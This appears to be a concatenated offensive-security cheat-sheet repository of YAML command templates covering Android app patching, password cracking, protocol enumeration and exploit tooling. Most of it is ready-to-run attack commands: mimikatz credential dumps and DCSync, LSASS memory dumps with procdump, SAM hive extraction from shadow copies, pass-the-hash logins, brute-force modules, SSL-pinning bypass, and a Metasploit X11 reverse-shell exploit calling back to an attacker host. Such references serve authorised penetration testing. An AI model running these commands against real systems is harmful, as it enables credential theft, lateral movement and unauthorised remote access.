24 | 25 | Sign apk with Uber-apk-signer 26 | java -jar uber-apk-signer-1.1.0.jar -a -------------------------------------------------------------------------------- /files/Mobile/Android/apktool.yaml: -------------------------------------------------------------------------------- 1 | name: apktool 2 | tags: [android, reverse, apktool] 3 | data: | 4 | plateform/linux #target/local #cat/ANDROID 5 | Decode an app (resources and smali) 6 | apktool d 7 | 8 | 9 | Build an app (the result is unsigned and must be signed before it installs) 10 | apktool b 11 | -------------------------------------------------------------------------------- /files/Mobile/Android/jadx.yaml: -------------------------------------------------------------------------------- 1 | name: Jadx 2 | tags: [android, reverse, jadx] 3 | data: | 4 | plateform/linux #target/local #cat/ANDROID 5 | Decompile an app 6 | jadx -d "$(pwd)/out" "$(pwd)/" 7 | 8 | 9 | -------------------------------------------------------------------------------- /files/Mobile/Android/objection.yaml: -------------------------------------------------------------------------------- 1 | name: Objection 2 | tags: [objection, android, ios, frida] 3 | data: | 4 | plateform/linux #target/local #cat/ANDROID 5 | Patch the app 6 | ``` 7 | objection patchapk -s 8 | ``` 9 | 10 | Patch the app without resource decoding 11 | ``` 12 | objection patchapk -D -s 13 | ``` 14 | 15 | Patch the app with debug flag 16 | ``` 17 | objection patchapk -d -s 18 | ``` 19 | 20 | Launch explore 21 | ``` 22 | objection explore 23 | ``` 24 | 25 | Launch explore with startup command 26 | 27 | ``` 28 | objection explore -s 29 | ``` 30 | 31 | Launch explore and disable SSL pinning at startup 32 | 33 | ``` 34 | objection explore -s "android sslpinning disable" 35 | ``` 36 | 37 | Launch explore with startup script 38 | 39 | ``` 40 | objection explore -S 41 | ``` -------------------------------------------------------------------------------- /files/Network/network.yaml: --------------------------------------------------------------------------------
1 | name: network 2 | tags: [network, ip] 3 | data: | 4 | 5 | ip infos (hostname / city / country / isp ) 6 | plateform/linux #target/remote #cat/UTILS 7 | ``` 8 | curl https://ipinfo.io/ 9 | ``` 10 | 11 | what is my ip 12 | plateform/linux #target/remote #cat/UTILS 13 | ``` 14 | curl https://ipinfo.io/ 15 | ``` 16 | 17 | what is my ip - plaintext 18 | plateform/linux #target/remote #cat/UTILS 19 | ``` 20 | curl https://ipecho.net/plain/ 21 | ``` 22 | 23 | % network, portquiz 24 | 25 | test an internet port out allow - curl (no 445) 26 | plateform/linux #target/remote #cat/UTILS 27 | ``` 28 | curl portquiz.net: 29 | ``` 30 | 31 | test an internet port out allow - nc (no 445) 32 | plateform/linux #target/remote #cat/UTILS 33 | ``` 34 | nc -v portquiz.net 35 | ``` 36 | -------------------------------------------------------------------------------- /files/New/test.yml: -------------------------------------------------------------------------------- 1 | # Test -------------------------------------------------------------------------------- /files/Password cracking/crackfiles.yaml: -------------------------------------------------------------------------------- 1 | name: Crack files 2 | tags: [bruteforce, crack, files] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/CRACKING/PASSWORD 6 | 7 | ZIP - fcrackzip 8 | ``` 9 | fcrackzip -u -D -p .zip 10 | ``` 11 | 12 | ZIP - john 13 | ``` 14 | zip2john .zip > zip.john; 15 | john zip.john 16 | ``` 17 | 18 | 7z - 7za 19 | ``` 20 | cat | 7za t .7z 21 | ``` 22 | 23 | 7z - john 24 | ``` 25 | ./7z2john.pl .7z > 7zhash.john; 26 | john 7zhash.john 27 | ``` 28 | 29 | PDF - pdfcrack 30 | ``` 31 | pdfcrack .pdf -w 32 | ``` 33 | 34 | PDF decrypt - qpdf 35 | ``` 36 | qpdf --password= --decrypt .pdf .pdf 37 | ``` 38 | 39 | = wordlist: /usr/share/wordlists/rockyou.txt 40 | -------------------------------------------------------------------------------- /files/Password cracking/hashcat.yaml: 
-------------------------------------------------------------------------------- 1 | name: hashcat 2 | tags: [password recovery, password cracking] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/CRACKING/PASSWORD 6 | 7 | hashcat - phpass (WordPress, phpBB3, Joomla >= 2.5.18; $P$/$H$ prefix, salted iterated MD5, not plain MD5) - wordlist 8 | ``` 9 | hashcat -a 0 -m 400 hashes 10 | ``` 11 | 12 | hashcat - phpass (WordPress, phpBB3, Joomla) - wordlist with rules 13 | ``` 14 | hashcat -a 0 -m 400 hashes -r /usr/share/hashcat/rules/best64.rule 15 | ``` 16 | 17 | hashcat - kerberos TGS-REP ticket (after kerberoasting); 13100 is etype 23 (RC4), AES tickets need 19600 (etype 17) or 19700 (etype 18) 18 | ``` 19 | hashcat -m 13100 --force -a 0 hashes 20 | ``` 21 | 22 | hashcat - LM 23 | ``` 24 | hashcat -m 3000 -a 0 hashes 25 | ``` 26 | 27 | hashcat - NTLM 28 | ``` 29 | hashcat -m 1000 -a 0 hashes 30 | ``` 31 | 32 | hashcat - NetNTLMv1 33 | ``` 34 | hashcat -m 5500 -a 0 hashes 35 | ``` 36 | 37 | hashcat - NetNTLMv2 38 | ``` 39 | hashcat -m 5600 -a 0 hashes 40 | ``` 41 | 42 | = wordlist: /usr/share/wordlists/rockyou.txt 43 | -------------------------------------------------------------------------------- /files/Password cracking/john.yaml: -------------------------------------------------------------------------------- 1 | name: john the ripper 2 | tags: [password recovery, password cracking] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/CRACKING/PASSWORD 6 | 7 | john LM 8 | ``` 9 | john --wordlist= --format=lm hash.txt 10 | ``` 11 | 12 | john NTLM 13 | ``` 14 | john --wordlist= --format=nt hash.txt 15 | ``` 16 | 17 | john NetNTLMv1 18 | ``` 19 | john --wordlist= --format=netntlm hash.txt 20 | ``` 21 | 22 | john NetNTLMv2 23 | ``` 24 | john --wordlist= --format=netntlmv2 hash.txt 25 | ``` 26 | 27 | 28 | = wordlist: /usr/share/wordlists/rockyou.txt 29 | -------------------------------------------------------------------------------- /files/Password extraction/lazagne.yaml: -------------------------------------------------------------------------------- 1 | name: Lazagne 2 | tags: [lazagne, dump password] 3 | data: | 4 | 5 |
  lazagne dump all passwords (triggers AV)
  plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER

  ```
  lazagne.exe all
  ```
--------------------------------------------------------------------------------
/files/Password extraction/mimikatz.yaml:
--------------------------------------------------------------------------------
name: mimikatz
tags: [mimikatz, passwords]
data: |

  mimikatz one-liner
  plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
  ```

  mimikatz dcsync - user (krbtgt/Administrator)
  plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  mimikatz.exe "privilege::debug" "lsadump::dcsync /domain: /user:" "exit"
  ```

  mimikatz extract credentials from dump
  plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"
  ```

  mimikatz extract credentials from shadow copy (1)
  plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  mimikatz.exe "lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM"
  ```

  mimikatz extract credentials from shadow copy (2)
  plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER

  Extract old passwords
  ```
  mimikatz.exe "lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY"
  ```

  # extract hives from an existing shadow volume copy
  plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  powershell.exe "[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM', '.\Desktop\SYSTEM.bkp');[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY', '.\Desktop\SECURITY.bkp');[System.IO.File]::Copy('\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM', '.\Desktop\SAM.bkp')"
  ```
--------------------------------------------------------------------------------
/files/Password extraction/procdump.yaml:
--------------------------------------------------------------------------------
name: procdump
tags: [procdump, lsass, credentials]
data: |

  procdump - dump lsass - local
  plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER
  ```cmd
  C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
  ```

  procdump - dump lsass - remote
  plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER
  ```cmd
  net use Z: https://live.sysinternals.com; Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
  ```



  procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp

  procdump.exe -accepteula -ma C:\Windows\Temp\lsass.dmp
--------------------------------------------------------------------------------
/files/Protocol/dns.yaml:
--------------------------------------------------------------------------------
name: DNS
tags: [dns, host, 53]
data: |

  host find name server
  plateform/linux #target/remote #cat/RECON
  ```
  host -t ns
  ```

  host find mail server
  plateform/linux #target/remote #cat/RECON
  ```
  host -t mx
  ```

  % dns, dig, 53

  dig dns lookup
  plateform/linux #target/remote #cat/RECON
  ```
  dig @1.1.1.1
  ```

  dig any information
  plateform/linux #target/remote #cat/RECON
  ```
  dig ANY @
  ```

  dig reverse lookup
  plateform/linux #target/remote #cat/RECON
  ```
  dig -x @
  ```

  dig zone transfer
  plateform/linux #target/remote #cat/RECON
  ```
  dig axfr @
  ```

  dig, find external, public IP address
  plateform/linux #target/remote #cat/RECON
  ```
  dig +short @resolver1.opendns.com
  ```

  dig, find ip address values for domains in a file
  plateform/linux #target/remote #cat/RECON
  ```
  dig -f +noall +answer
  ```

  dig, find MX records for domains in a file
  plateform/linux #target/remote #cat/RECON
  ```
  dig -f MX +noall +answer
  ```

  % dns, dnsrecon, 53

  dnsrecon standard enum on domain
  plateform/linux #target/remote #cat/RECON
  ```
  dnsrecon -d
  ```

  dnsrecon zone transfer
  plateform/linux #target/remote #cat/RECON
  ```
  dnsrecon -d -t axfr
  ```

  dnsrecon reverse lookup start/end ip
  plateform/linux #target/remote #cat/RECON
  ```
  dnsrecon -r - -n
  ```

  dnsrecon reverse lookup network range ip
  plateform/linux #target/remote #cat/RECON
  ```
  dnsrecon -r -n
  ```

  dnsrecon domain bruteforce
  plateform/linux #target/remote #cat/RECON
  ```
  dnsrecon -d -D -t brt
  ```

  % dns, dnsenum, 53
  plateform/linux #target/remote #cat/RECON
  ```
  dnsenum
  ```

  % dns, nmap, 53

  nmap grab banner
  plateform/linux #target/remote #cat/RECON
  ```
  nmap -sV -p 53 --script dns-nsid
  ```

  nmap dns tcp
  plateform/linux #target/remote #cat/RECON
  ```
  nmap -n -sV --script "(*dns* and (default or (discovery and safe))) or dns-random-txid or dns-random-srcport" -p 53
  ```

  nmap dns udp
  plateform/linux #target/remote #cat/RECON
  ```
  nmap -n -sV -sU --script "(*dns* and (default or (discovery and safe))) or dns-random-txid or dns-random-srcport" -p 53
  ```

  nmap active directory enum
  plateform/linux #target/remote #cat/RECON
  ```
  nmap --script dns-srv-enum --script-args "dns-srv-enum.domain=''"
  ```

  nmap dnssec
  plateform/linux #target/remote #cat/RECON
  ```
  nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=
  ```

  % dns, msf, 53

  dns metasploit enumeration
  plateform/linux #target/remote #cat/RECON
  ```
  msfconsole -x "use auxiliary/gather/enum_dns; set domain ; set ns ; exploit"
  ```

  % dns, sublist3r , 53

  dns sublist3r - subdomain enumeration
  plateform/linux #target/remote #cat/RECON
  ```
  sublist3r -d -v
  ```

  dns sublist3r - subdomain enumeration with bruteforce module enabled
  plateform/linux #target/remote #cat/RECON
  ```
  sublist3r -b -d
  ```
--------------------------------------------------------------------------------
/files/Protocol/ftp.yaml:
--------------------------------------------------------------------------------
name: FTP
tags: [ftp, 21]
data: |
  plateform/linux #target/remote #port/21 #protocol/ftp

  ftp - download all
  cat/ATTACK/FILE_TRANSFERT
  ```
  wget -m ftp://anonymous:anonymous@
  ```

  ftp download all (2)
  cat/ATTACK/FILE_TRANSFERT
  ```
  wget -m --no-passive ftp://anonymous:anonymous@
  ```

  ftp - connect
  cat/ATTACK/CONNECT
  ```
  ftp
  ```

  ftp - connect port
  cat/ATTACK/CONNECT
  ```
  ftp
  ```

  ftp - enum anonymous
  cat/ATTACK/CONNECT
  ```
  nmap -v -p 21 --script=ftp-anon.nse
  ```

  ftp - msf bruteforce login
  cat/ATTACK/BRUTEFORCE-SPRAY
  ```
  msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS ; set USER_FILE ; set PASS_FILE ; exploit"
  ```

--------------------------------------------------------------------------------
/files/Protocol/ldap.yaml:
--------------------------------------------------------------------------------
name: ldap
tags: [ldap,ldapsearch]
data: |

  ldap nmap
  cat/RECON
  ```
  nmap -n -sV --script "ldap* and not brute" -p 389
  ```

  ldapsearch base
  cat/ATTACK/CONNECT
  ```
  ldapsearch -x -h -s base
  ```

  ldapsearch with base dn
  cat/ATTACK/CONNECT
  ```
  ldapsearch -x -h -b
  ```

  ldapsearch base with authentication
  cat/ATTACK/CONNECT
  ```
  ldapsearch -x -h -D \\ -w -b 'DC=,DC='
  ```

  ldapdomaindump
  cat/ATTACK/CONNECT
  ```
  ldapdomaindump --no-json --no-grep --authtype SIMPLE -o ldap_dump -r -u \\ -p
  ```
--------------------------------------------------------------------------------
/files/Protocol/mssql.yaml:
--------------------------------------------------------------------------------
name: mssql
tags: [mssql, Microsoft SQL Server, 1433]
data: |
  plateform/linux #target/remote #protocol/mssql #port/1433

  # mssql - connect
  cat/ATTACK/CONNECT
  ```
  sqsh -S -U
  ```

  mssql - enum
  cat/RECON
  ```
  nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433
  ```

  mssql - enum sql login
  cat/ATTACK/BRUTEFORCE-SPRAY
  ```
  msfconsole -x "use admin/mssql/mssql_enum_sql_logins; set RHOSTS ; set USER_FILE ; set PASS_FILE ; run"
  ```

  mssql - enum configuration setting (xp-cmdshell)
  cat/RECON
  ```
  msfconsole -x "use auxiliary/admin/mssql/mssql_enum; set RHOST ; set password ; run"
  ```

  mssql link crawler
  cat/ATTACK/EXPLOIT
  ```
  msfconsole -x "use exploit/windows/mssql/mssql_linkcrawler"
  ```
--------------------------------------------------------------------------------
/files/Protocol/mysql.yaml:
--------------------------------------------------------------------------------
name: Mysql
tags: [mysql, database, db, 3306]
data: |
  plateform/linux #target/remote #protocol/mysql #port/3306
  connect
  cat/ATTACK/CONNECT
  ```
  mysql -u -p -h
  ```

  Create database
  cat/UTILS
  ```
  mysql -u -p -e "create database character set UTF8mb4 collate utf8mb4_bin"
  ```

  Export database
  cat/UTILS
  ```
  mysqldump -u -p >
  ```

  Import database
  cat/UTILS
  ```
  mysql -u -p
  ```

  nmap - mysql enumeration
  cat/RECON
  ```
  nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
  ```
--------------------------------------------------------------------------------
/files/Protocol/netbios.yaml:
--------------------------------------------------------------------------------
name: netbios
tags: [netbios, scan, nbtscan]
data: |
  plateform/linux #target/remote #protocol/netbios
  nbtscan - netbios scan
  cat/RECON
  ```
  nbtscan -r
  ```

--------------------------------------------------------------------------------
/files/Protocol/nfs.yaml:
--------------------------------------------------------------------------------
name: nfs
tags: [nfs, showmount, 2049]
data: |
  plateform/linux #target/remote #protocol/nfs #port/2049

  nfs showmount
  cat/RECON
  ```
  showmount -e
  ```

  nfs - nmap showmount
  cat/RECON
  ```
  nmap -sV --script=nfs-showmount
  ```

  nfs - mount
  cat/ATTACK/CONNECT
  ```
  mount -t nfs : -o nolock
  ```

  nfs - mount with v2 (no authentication)
  cat/ATTACK/CONNECT
  ```
  mount -t nfs -o vers=2 : -o nolock
  ```
--------------------------------------------------------------------------------
/files/Protocol/pop.yaml:
--------------------------------------------------------------------------------
name: pop
tags: [pop, pop3, 110, 995]
data: |
  plateform/linux #target/remote #protocol/pop #port/110 #port/995

  nmap - pop3 infos
  cat/RECON
  ```
  nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p
  ```
--------------------------------------------------------------------------------
/files/Protocol/postgres.yaml:
--------------------------------------------------------------------------------
name: Postgres
tags: [postgres, 5432, 5433]
data: |
  plateform/linux #target/remote #protocol/postgres #port/5432 #port/5433

  postgres - connect
  cat/ATTACK/CONNECT
  ```
  psql -h -U
  ```

  postgres - connect database
  cat/ATTACK/CONNECT
  ```
  psql -h -U -d
  ```

  postgres - connect full options
  cat/ATTACK/CONNECT
  ```
  psql -h -p -U -W
  ```
--------------------------------------------------------------------------------
/files/Protocol/rdp.yaml:
--------------------------------------------------------------------------------
name: windows rdp
tags: [rdp, windows, 3389]
data: |
  plateform/windows #target/local #protocol/rdp #port/3389

  enable RDP
  cat/POSTEXPLOIT
  ```
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
  ```

  Add firewall authorisation RDP
  cat/POSTEXPLOIT
  ```
  netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp
  ```

  rdesktop
  % rdp, windows
  plateform/linux #target/remote #protocol/rdp #port/3389 #cat/ATTACK/CONNECT

  rdesktop - classic
  ```
  rdesktop -g 90% -u -p -d
  ```

  rdesktop - with share
  ```
  rdesktop -g 90% -u -p -d -r disk:share=
  ```

  xfreerdp

  % rdp, windows
  plateform/linux #target/remote #protocol/rdp #port/3389 #cat/ATTACK/CONNECT

  xfreerdp - classic
  ```
  xfreerdp /u: /p: /d: /v: /size:1800x924
  ```

  xfreerdp - with share
  ```
  xfreerdp /u: /p: /d: /v: /size:1800x924 /drive:share,
  ```

  xfreerdp - pass the hash
  ```
  xfreerdp /u: /pth: /d: /v:
  ```
--------------------------------------------------------------------------------
/files/Protocol/smb/enum4linux.yaml:
--------------------------------------------------------------------------------
name: enum4linux
tags: [smb, samba]
data: |

  plateform/linux #target/remote #port/445 #protocol/smb #cat/RECON

  enum4linux - all except dictionary based share name listing (default)
  ```
  enum4linux -a
  ```

  enum4linux - verbose
  ```
  enum4linux -v
  ```

  enum4linux - null access
  ```
  enum4linux -u "" -p ""
  ```

  enum4linux - guest access
  ```
  enum4linux -u "guest" -p ""
  ```

  enum4linux - with authentication
  ```
  enum4linux -u -p
  ```

  enum4linux - list Users
  ```
  enum4linux -U |grep 'users:'
  ```
--------------------------------------------------------------------------------
/files/Protocol/smb/smb.yaml:
--------------------------------------------------------------------------------
name: smb
tags: []
data: |
  nbtscan - scan network looking for hosts
  plateform/linux #target/remote #port/445 #protocol/smb #cat/RECON
  ```
  nbtscan -r
  ```

  smbclient with username and password
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  ```
  smbclient \\\\\\ -U "%"
  ```

  smbclient sessions without password
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  ```
  smbclient \\\\\\ -U "%"
  ```

  smbclient null session
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  ```
  smbclient \\\\\\ -U "%"
  ```

  smb - find not signed smb
  plateform/linux #target/remote #port/445 #protocol/smb #cat/RECON
  ```
  nmap -Pn -sS -T4 --open --script smb-security-mode -p445
  ```

  smb mount folder
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  ```
  mount -t cifs ///C\$ /tmp/mnttarget/ -o username= -o domain=
  ```
--------------------------------------------------------------------------------
/files/Protocol/smb/smbmap.yaml:
--------------------------------------------------------------------------------
name: smbmap
tags: []
data: |
  smbmap
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT

  ```
  smbmap -H -u "%"
  ```

  smbmap - null access
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT

  ```
  smbmap -u "" -p "" -P 445 -H
  ```

  smbmap - guest access
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  ```
  smbmap -u "guest" -p "" -P 445 -H
  ```

  smbmap - list root of all shares
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  ```
  smbmap -H -u -p -d -r
  ```

  smbmap - recursively list dirs, and files
  plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT
  ```
  smbmap -H -u -p -d -R --depth 1
  ```

  = ip: 192.168.1.0/24
--------------------------------------------------------------------------------
/files/Protocol/smtp.yaml:
--------------------------------------------------------------------------------
name: SMTP
tags: [smtp, 25]
data: |
  plateform/linux #target/remote #protocol/smtp #port/25

  smtp nmap enumeration
  cat/RECON
  ```
  nmap -p25 --script smtp-commands
  ```

  smtp nmap ntlm information disclosure
  cat/RECON
  ```
  nmap -p25 --script smtp-ntlm-info
  ```

  nmap - smtp user enum
  cat/ATTACK/BRUTEFORCE-SPRAY
  ```
  nmap --script smtp-enum-users.nse
  ```

  smtp user enum
  cat/ATTACK/BRUTEFORCE-SPRAY
  ```
  smtp-user-enum -M VRFY -U -t
  ```

  msf - smtp user enum
  cat/ATTACK/BRUTEFORCE-SPRAY
  ```
  msfconsole -x "use auxiliary/scanner/smtp/smtp_enum; set RHOSTS ; exploit"
  ```
--------------------------------------------------------------------------------
/files/Protocol/snmp.yaml:
--------------------------------------------------------------------------------
name: snmp
tags: [snmp, 161]
data: |

  plateform/linux #target/remote #protocol/snmp #port/161

  nmap, snmp scan
  cat/RECON
  ```
  nmap -sU --open -p 161 -sC -sV
  ```

  nmap, snmp brute
  cat/ATTACK/BRUTEFORCE-SPRAY
  ```
  nmap -sU --open -p 161 --script=snmp-brute --script-args snmp-brute.communitiesdb=
  ```

  onesixtyone
  cat/RECON
  ```
  echo public > community; echo private >> community; echo manager >> community; onesixtyone -c community -i ips; rm community
  ```

  snmpwalk entire tree
  cat/RECON
  ```
  snmpwalk -c public -v1
  ```

--------------------------------------------------------------------------------
/files/Protocol/ssh.yaml:
--------------------------------------------------------------------------------
name: ssh
tags: [ssh, 22]
data: |
  plateform/linux #target/remote #protocol/ssh #port/22

  Start ssh agent
  target/local #cat/UTILS
  ```
  eval "$(ssh-agent -s)"; ssh-add
  ```

  SSH local port forwarding (get remote_port on local)
  cat/PIVOT/TUNNEL-PORTFW
  ```
  ssh -L :: @
  ```

  SSH remote port forwarding (send local port to remote) (need GatewayPorts yes)
  cat/PIVOT/TUNNEL-PORTFW
  ```
  ssh -R ::: @
  ```

  SSH proxysocks
  cat/PIVOT/TUNNEL-PORTFW
  ```
  ssh -D @
  ```

  get public ssh key of server
  cat/UTILS
  ```
  ssh-keyscan -t rsa -p
  ```

  msf - bruteforce username
  cat/ATTACK/BRUTEFORCE-SPRAY
  ```
  msfconsole -x "use scanner/ssh/ssh_enumusers; set RHOSTS ; set USER_FILE ; set CHECK_FALSE true; exploit"
  ```

  SSH - old algorithm
  cat/UTILS
  ```
  ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 @
  ```
--------------------------------------------------------------------------------
/files/Protocol/telnet.yaml:
--------------------------------------------------------------------------------
name: telnet
tags: [telnet, 23]
data: |
  plateform/linux #target/remote #protocol/telnet #port/23

  nmap - telnet
  cat/RECON
  ```
  nmap -n -sV -Pn --script "*telnet* and safe" -p 23
  ```
--------------------------------------------------------------------------------
/files/Protocol/vnc.yaml:
--------------------------------------------------------------------------------
name: VNC
tags: [vnc, 5800, 5801, 5900, 5901]
data: |
  plateform/linux #target/remote #protocol/vnc #port/5800 #port/5801 #port/5900 #port/5901

  vnc - nmap enum
  cat/RECON
  ```
  nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p
  ```

  vncviewer - connect to vnc no pass
  cat/ATTACK/CONNECT
  ```
  vncviewer ::
  ```

  vncviewer - connect to vnc with password
  cat/ATTACK/CONNECT
  ```
  vncviewer -password ::
  ```

  vnc msf test none auth
  cat/ATTACK/CONNECT
  ```
  msfconsole -x "use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS ; set RPORT ; run"
  ```

  vnc - msf test login bf
  cat/ATTACK/BRUTEFORCE-SPRAY
  ```
  msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS ; set RPORT ; set USERNAME ; run"
  ```

  vnc - msf test login bf (2)
  cat/ATTACK/BRUTEFORCE-SPRAY
  ```
  msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS ; set RPORT ; set USER_FILE ; set PASS_FILE ; run"
  ```

  vnc - post exploit retrieve credentials
  cat/POSTEXPLOIT/CREDS_RECOVER
  ```
  msfconsole -x "use post/windows/gather/credentials/vnc; set SESSION ; run"
  ```
--------------------------------------------------------------------------------
/files/Protocol/winrm.yaml:
--------------------------------------------------------------------------------
name: winrm
tags: [windows, remote, winrm, evilwinrm, 5985, 5986]
data: |
  plateform/linux #target/remote #protocol/winrm #port/5985 #port/5986

  Enable winrm (powershell)
  plateform/windows #target/local #cat/UTILS
  ```powershell
  Enable-PSRemoting -Force
  Set-Item wsman:\localhost\client\trustedhosts *
  ```

  Enable winrm (wmic)
  plateform/windows #target/local #cat/UTILS
  ```batchfile
  wmic /node: process call create "powershell enable-psremoting -force"
  ```

  Test target is configured to use winrm (powershell)
  plateform/windows #target/local #cat/RECON
  ```powershell
  Test-WSMan -computername
  ```

  Execute a command on the target over winrm (powershell)
  plateform/windows #target/remote #cat/ATTACK/EXPLOIT
  ```powershell
  Invoke-Command -computername -ScriptBlock {} -credential \
  ```

  Execute a script on the target over winrm (powershell)
  plateform/windows #target/remote #cat/ATTACK/EXPLOIT
  ```powershell
  Invoke-Command -ComputerName -FilePath -credential \
  ```

  Get a powershell session with winrm (powershell)
  plateform/windows #target/remote #cat/ATTACK/EXPLOIT
  ```powershell
  Enter-PSSession -ComputerName -Credential \
  ```

  Enable winrm remotely from psexec
  plateform/windows #target/remote #cat/ATTACK/EXPLOIT
  ```batchfile
  .\PsExec.exe \\ -u \ -p -h -d powershell.exe "enable-psremoting -force"
  ```

  evil-winrm install
  target/local #cat/UTILS
  ```
  gem install evil-winrm
  ```

  evil-winrm use
  plateform/linux #target/remote #cat/ATTACK/CONNECT
  ```
  evil-winrm -i / -u -p
  ```

  evil-winrm use pass the hash
  plateform/linux #target/remote #cat/ATTACK/CONNECT
  ```
  evil-winrm -i / -u -H
  ```
--------------------------------------------------------------------------------
/files/Protocol/x11.yaml:
--------------------------------------------------------------------------------
name: X11
tags: [x11, 6000]
data: |
  plateform/linux #target/remote #protocol/x11 #port/6000

  # x11 - check anonymous connection
  cat/ATTACK/CONNECT
  ```
  nmap -sV --script x11-access -p
  ```

  x11 - verify connection
  cat/RECON
  ```
  xdpyinfo -display :
  ```

  x11 - verify connection (2)
  cat/RECON
  ```
  xwininfo -root -tree -display :
  ```

  X11 - screenshot
  cat/ATTACK/EXPLOIT
  ```
  xwd --root --screen --silent --display : > screenshot.xwd; convert screenshot.xwd screenshot.png
  ```

  X11 - keylogging
  cat/ATTACK/EXPLOIT
  ```
  xspy
  ```

  X11 - remote desktop view
  cat/ATTACK/CONNECT
  ```
  xrdp :
  ```

  X11 - msf reverse shell
  cat/ATTACK/EXPLOIT
  ```
  msfconsole -x "use exploit/unix/x11/x11_keyboard_exec; set RHOSTS ; set payload cmd/unix/reverse_bash; set lhost ; set lport ; exploit"
  ```

  = display: 0
--------------------------------------------------------------------------------
/files/Pwn/bof.yaml:
--------------------------------------------------------------------------------
name: bof
tags: [bof, buffer overflow]
data: |
  plateform/linux #target/local #cat/PWN

  bof, pattern creation
  ```
  msf-pattern_create -l
  ```

  bof, pattern offset
  ```
  msf-pattern_offset -l -q
  ```

  bof, nasm - show opcode from asm
  ```
  msf-nasm_shell
  nasm > jmp esp
  ```

  % bof, ropgadget

  ropgadget - Specify a binary filename to analyze
  ```
  ROPgadget --binary
  ```

  ropgadget - Enable the ROP chain generation
  ```
  ROPgadget --binary --ropchain
  ```

  ropgadget - Search opcode in executable segment
  ```
  ROPgadget --binary --opcode
  ```

  ropgadget - Search string between two addresses (0x...-0x...)
  ```
  ROPgadget --binary --string --range -
  ```

  # ropgadget - Only show specific instructions
  ```
  ROPgadget --binary --only=""
  ```

  # ropgadget - Suppress specific mnemonics
  ```
  ROPgadget --binary --filter=""
  ```

  % bof, mona

  mona - Show all loaded modules and their properties
  ```
  !mona modules
  ```

  mona - Configure the log directory (no need to create it)
  ```
  !mona config -set workingfolder
  ```

  mona - Verify the current log directory
  ```
  !mona config -get workingfolder
  ```

  mona - Create a cyclic pattern of a given size
  ```
  !mona pc
  ```

  mona - Find cyclic pattern in memory
  ```
  !mona findmsp
  ```

  mona - Find location (offset) of 4 bytes in a cyclic pattern
  ```
  !mona po
  ```

  mona - Find bytes in memory (ex: eggs)
  ```
  !mona find -s
  ```

  mona - Find pointers that will allow you to jump to a register (without null bytes)
  ```
  !mona jmp -r -n
  ```

  mona - Find a function in IAT
  ```
  !mona getiat -s
  ```

  mona - Show the current SEH chain
  ```
  !mona sehchain
  ```

